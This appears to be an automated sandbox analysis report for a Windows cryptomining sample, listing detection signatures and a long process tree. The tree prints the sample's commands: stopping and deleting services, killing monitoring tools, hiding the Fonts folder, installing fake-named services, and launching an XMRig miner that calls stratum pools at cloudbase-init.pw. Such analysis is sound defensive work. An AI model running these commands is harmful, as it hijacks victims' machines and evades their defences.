Analysis
-
max time kernel
155s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 18:36
General
-
Target
4b61679662313916b18999fbe63ea2d0163d2b3e6aad16e09aea27cbb97dac9e.exe
-
Size
2.1MB
-
MD5
087d6c8306538655e99a7cbc734152e6
-
SHA1
3f4499b01e23549ce5c2992ffaf098de9ed4cbc6
-
SHA256
4b61679662313916b18999fbe63ea2d0163d2b3e6aad16e09aea27cbb97dac9e
-
SHA512
60b8822d1cff7fb8b82484a50fb195148d9f0d11c5d5d14a9f01c5622a324ec433828087c32416037b0567d68527364d6795bb302575d6b5e739e027ea400b40
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 4 IoCs
-
Executes dropped EXE 16 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 15 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 6 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b61679662313916b18999fbe63ea2d0163d2b3e6aad16e09aea27cbb97dac9e.exe"C:\Users\Admin\AppData\Local\Temp\4b61679662313916b18999fbe63ea2d0163d2b3e6aad16e09aea27cbb97dac9e.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\net.exenet stop MicrosotMaims2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MicrosotMaims3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims2⤵
-
C:\Windows\SysWOW64\net.exenet stop MicrosotMais2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MicrosotMais3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais2⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MicrosotMaims c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MicrosotMaims DisplayName Network Location Service2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MicrosotMaims Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MicrosotMaims2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MicrosotMais dl1hots -o stratum+tcp://my.cloudbase-init.pw:9001 -u Admin -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=3 --nicehash -o stratum+tcp://mys.cloudbase-init.pw:9009 -u Admin -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=3 --nicehash3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MicrosotMais Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MicrosotMais3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MicrosotMais DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MicrosotMais dl1hots -o stratum+tcp://my.cloudbase-init.pw:9001 -u Admin -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=3 --nicehash -o stratum+tcp://mys.cloudbase-init.pw:9009 -u Admin -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=3 --nicehash3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MicrosotMais3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MicrosotMais Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MicrosotMais DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
